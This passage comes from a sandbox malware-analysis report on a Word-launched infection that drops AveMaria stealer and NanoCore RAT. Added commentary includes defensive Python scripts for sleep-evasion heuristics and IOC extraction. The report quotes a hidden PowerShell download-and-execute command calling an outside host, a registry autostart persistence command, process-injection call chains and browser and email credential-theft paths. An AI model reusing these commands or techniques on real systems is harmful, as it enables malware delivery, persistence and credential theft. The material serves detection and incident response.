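    """Label one sleep value: parked forever, long enough to outlast analysis, or short."""
    if ms >= TIMESPAN_MAX_MS:
        return "infinite"   # the thread is parked; nothing is being timed
    if ms >= LONG_SLEEP_MS:
        return "long"       # beats a typical sandbox budget if chained
    return "short"


def parse_rows(rows):
    """Return (process, kind, value, label) for every sleep row; other rows are skipped."""
    events = []
    for row in rows:
        m = ROW_RE.match(row.strip())
        if not m:
            continue
        proc = m.group("proc").rsplit("\\", 1)[-1].lower()
        value = int(m.group("value"))
        if m.group("kind") == "time":
            events.append((proc, "time", value, classify_delay(value)))
        else:
            label = "loop" if value > SLEEP_COUNT_LIMIT else "normal"
            events.append((proc, "count", value, label))
    return events


def summarize(events):
    """Per-process totals: parked threads, summed finite delay, sleep loops."""
    per = defaultdict(lambda: {"parked": 0, "finite_ms": 0, "loops": 0})
    for proc, kind, value, label in events:
        s = per[proc]
        if kind == "time":
            if label == "infinite":
                s["parked"] += 1
            else:
                s["finite_ms"] += value
        elif label == "loop":
            s["loops"] += 1
    return dict(per)


def flagged(summary):
    """Processes whose sleep behaviour alone trips the evasion heuristic."""
    return sorted(p for p, s in summary.items()
                  if s["parked"] or s["loops"] or s["finite_ms"] >= LONG_SLEEP_MS)


if __name__ == "__main__":
    summary = summarize(parse_rows(SAMPLE_ROWS))
    for proc, s in sorted(summary.items()):
        print(f"{proc:16} parked={s['parked']} finite={s['finite_ms']/1000:.1f}s loops={s['loops']}")
    print("flagged:", flagged(summary))
```

A parked thread is not evidence of a timing check on its own (NanoCore's plugin host and many .NET loaders keep a thread asleep forever for unrelated reasons); the rows that matter for a sandbox budget are the finite ones, and cmd.exe's 709 loops of 12 s are the clearest instance of deliberate stalling in this report.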

        HIPS / PFW / Operating System Protection Evasion:

        Allocates memory in foreign processes
        Source: C:\ProgramData\images.exe | Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 120000 protect: page execute and read and write
        Source: C:\ProgramData\images.exe | Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 130000 protect: page read and write
        Bypasses PowerShell execution policy
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Contains functionality to inject threads in other processes
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
        Creates a thread in another existing process (thread injection)
        Source: C:\ProgramData\images.exe | Thread created: C:\Windows\SysWOW64\cmd.exe EIP: 12010E
        Injects a PE file into a foreign processes
        Source: C:\Users\user\AppData\Roaming\putty.exe | Memory written: C:\Users\user\AppData\Roaming\putty.exe base: 400000 value starts with: 4D5A (2 identical rows)
        Source: C:\ProgramData\images.exe | Memory written: C:\ProgramData\images.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Memory written: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe base: 400000 value starts with: 4D5A
        Injects files into Windows application
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Injected file: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT was created by C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Windows\System32\notepad.exe | Injected file: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Writes to foreign memory regions
        Source: C:\ProgramData\images.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 120000
        Source: C:\ProgramData\images.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 130000
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe (2 identical rows)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe' (2 identical rows)
        Source: C:\Users\user\AppData\Roaming\putty.exe | Process created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe (4 identical rows)
        Source: C:\Users\user\AppData\Roaming\putty.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exe | Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\ProgramData\images.exe | Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\ProgramData\images.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: C:\ProgramData\images.exe | Process created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe 'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Process created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe (2 identical rows)
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'' (6 identical rows)
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00412E91 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00410A8C AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,
        Source: images.exe | Binary or memory string: GetProgmanWindow
        Source: images.exe | Binary or memory string: SetProgmanWindow
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00410E5E cpuid
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE | Queries volume information: C:\Users\user\AppData\Local\Temp\OICE_9306262C-FECE-4A9E-949D-FCC308D5F5A8.0\FLD93F.tmp VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (2 identical rows)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\ProgramData\images.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
        Source: C:\ProgramData\images.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\ProgramData\images.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
        Source: C:\ProgramData\images.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
        Source: C:\Windows\System32\notepad.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT VolumeInformation
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Queries volume information: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe VolumeInformation
        Source: C:\Windows\System32\drvinst.exe | Queries volume information: C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat VolumeInformation
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Queries volume information: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00408D0F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,CreateDirectoryW,lstrcpyW,lstrcatW,GetLocalTime,wsprintfW,CreateFileW,CloseHandle,RegisterClassW,CreateWindowExW,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA,
        Source: C:\ProgramData\images.exe | Code function: 21_3_042973C6 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,
        Source: C:\ProgramData\images.exe | Code function: 21_3_042394E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
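        The WINWORD.EXE to powershell.exe row above is the whole delivery chain in one command line, and the putty.exe to cmd.exe to reg.exe rows are its persistence: the Load value under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows is the registry mapping of the old win.ini load= line and is executed at logon, which is why the report flags it as an undocumented autostart. The script below is an added example, not part of the report: it takes those two command lines verbatim as input and pulls out what a responder needs from them (download URL and host, drop path, whether the dropped file is started, which switches silence the console, and the autostart key, value and data). The switch table, the autostart-value list and the two verdict rules are my assumptions, not sandbox logic; sandbox rows render every quote as a single quote, so the cradle is parsed by structure rather than with shlex.

```python
"""Extract IOCs from the 'Process created' rows of the report above.

Added example, not part of the sandbox report. CRADLE and REG_ADD are copied
from the report rows; the parsing and the verdict rules are mine.
"""
import re
from urllib.parse import urlparse

CRADLE = ("'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' -NoP -sta -NonI "
          "-W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient)"
          ".DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\\Users\\user\\AppData\\Roaming\\putty.exe');"
          "Start-Process 'C:\\Users\\user\\AppData\\Roaming\\putty.exe''")
REG_ADD = ("REG ADD 'HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows' "
           "/f /v Load /t REG_SZ /d 'C:\\ProgramData\\images.exe'")

# powershell.exe accepts any unambiguous prefix of a switch (-NoP, -NonI, -W ...).
SWITCHES = ["-noprofile", "-noninteractive", "-windowstyle", "-executionpolicy",
            "-nologo", "-sta", "-command", "-encodedcommand", "-file"]
# Switches that only make sense when nobody is meant to see the console.
SILENT = {"-noprofile", "-noninteractive", "-windowstyle", "-executionpolicy", "-nologo"}
# Logon-time autostart values outside the usual Run/RunOnce keys (my list, not the report's).
AUTOSTART_VALUES = {
    ("software\\microsoft\\windows nt\\currentversion\\windows", "load"),
    ("software\\microsoft\\windows nt\\currentversion\\windows", "run"),
}


def canonical(token: str):
    """Expand an abbreviated switch to its full name; None if not a (unique) switch."""
    t = token.lower()
    if not t.startswith("-"):
        return None
    hits = [s for s in SWITCHES if s.startswith(t)]
    return hits[0] if len(hits) == 1 else None


def parse_cradle(cmdline: str) -> dict:
    """Split 'exe switches... -command script' and pull the download/execute details."""
    head, script = cmdline, ""
    for m in re.finditer(r"(?<!\S)(-\w+)", cmdline):     # switches precede -command
        if canonical(m.group(1)) == "-command":
            head, script = cmdline[:m.start()], cmdline[m.end():]
            break
    toks = re.findall(r"'[^']*'|\S+", head)
    exe = toks[0].strip("'")
    flags, i = {}, 1
    while i < len(toks):
        name = canonical(toks[i])
        if name in ("-windowstyle", "-executionpolicy") and i + 1 < len(toks):
            flags[name] = toks[i + 1].lower()            # switch takes an argument
            i += 2
        else:
            if name:
                flags[name] = True
            i += 1
    dl = re.search(r"DownloadFile\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]+)['\"]", script, re.I)
    sp = re.search(r"Start-Process\s+['\"]?([^'\";]+)", script, re.I)
    return {
        "exe": exe,
        "flags": flags,
        "silent": sorted(f for f in flags if f in SILENT),
        "url": dl.group(1) if dl else None,
        "host": urlparse(dl.group(1)).hostname if dl else None,
        "download_path": dl.group(2) if dl else None,
        "started": sp.group(1).strip() if sp else None,
    }


def is_download_and_execute(p: dict) -> bool:
    """Fetch + run of the same file from a console nobody is meant to see."""
    fetched = p["url"] is not None and p["download_path"] is not None
    ran = p["started"] is not None and p["started"].lower() == (p["download_path"] or "").lower()
    quiet = p["flags"].get("-windowstyle") == "hidden" or p["flags"].get("-executionpolicy") == "bypass"
    return fetched and ran and quiet


def parse_reg_add(cmdline: str):
    """Parse 'REG ADD <key> /v <name> /t <type> /d <data> [/f]' wherever it sits in the line."""
    m = re.search(r"REG\s+ADD\s+(?P<key>'[^']*'|\"[^\"]*\"|\S+)(?P<rest>.*)", cmdline, re.I)
    if not m:
        return None
    rest = re.findall(r"'[^']*'|\"[^\"]*\"|\S+", m.group("rest"))
    opts, i = {}, 0
    while i < len(rest):
        tok = rest[i].lower()
        if tok in ("/v", "/t", "/d") and i + 1 < len(rest):
            opts[tok] = rest[i + 1].strip("'\"")
            i += 2
        else:
            opts[tok] = True
            i += 1
    return {"key": m.group("key").strip("'\""), "value_name": opts.get("/v"),
            "type": opts.get("/t"), "data": opts.get("/d"), "force": "/f" in opts}


def is_autostart(reg: dict) -> bool:
    """True when the key/value pair is a known logon-time autostart location."""
    key = re.sub(r"^(hkcu|hkey_current_user|hklm|hkey_local_machine)\\", "", reg["key"].lower())
    return (key, (reg["value_name"] or "").lower()) in AUTOSTART_VALUES


if __name__ == "__main__":
    p, r = parse_cradle(CRADLE), parse_reg_add(REG_ADD)
    print("cradle:", p["host"], p["url"], "->", p["download_path"], "silent:", p["silent"])
    print("download-and-execute:", is_download_and_execute(p))
    print("persistence:", r["key"], r["value_name"], "=", r["data"], "autostart:", is_autostart(r))
```

The verdict rule deliberately requires all three pieces (a fetch, a start of the fetched path, and a hidden or policy-bypassing console): a plain `DownloadFile` in an admin script is routine, and `-WindowStyle Hidden` alone is how scheduled tasks are normally run. For hunting, the two strings worth pivoting on are the host newhosteeeee.ydns.eu and the odd-cased `httP://` scheme, which survives in process-creation telemetry exactly as written.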

        Lowering of HIPS / PFW / Operating System Security Settings:

        Increases the number of concurrent connection per server for Internet Explorer
        Source: C:\Users\user\AppData\Roaming\putty.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10
        Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct (9 identical rows)
        Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct (9 identical rows)
        Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct (9 identical rows)
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct (9 identical rows)
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct (9 identical rows)
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct (9 identical rows)

        Stealing of Sensitive Information:

        Yara detected AveMaria stealer
        Source: Yara match | File source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.3.images.exe.61381d.6.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
        Yara detected Nanocore RAT
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Contains functionality to steal Chrome passwords or cookies
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: \Google\Chrome\User Data\Default\Login Data
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: \Chromium\User Data\Default\Login Data
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: \Google\Chrome\User Data\Default\Login Data
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: \Chromium\User Data\Default\Login Data
        Contains functionality to steal e-mail passwords
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: POP3 Password
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: SMTP Password
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: IMAP Password
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: POP3 Password
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: SMTP Password
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: IMAP Password
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\ProgramData\images.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\logins.json
        Source: C:\ProgramData\images.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\ProgramData\images.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
        Source: C:\ProgramData\images.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: C:\ProgramData\images.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
        Source: C:\ProgramData\images.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
        Source: Yara match | File source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
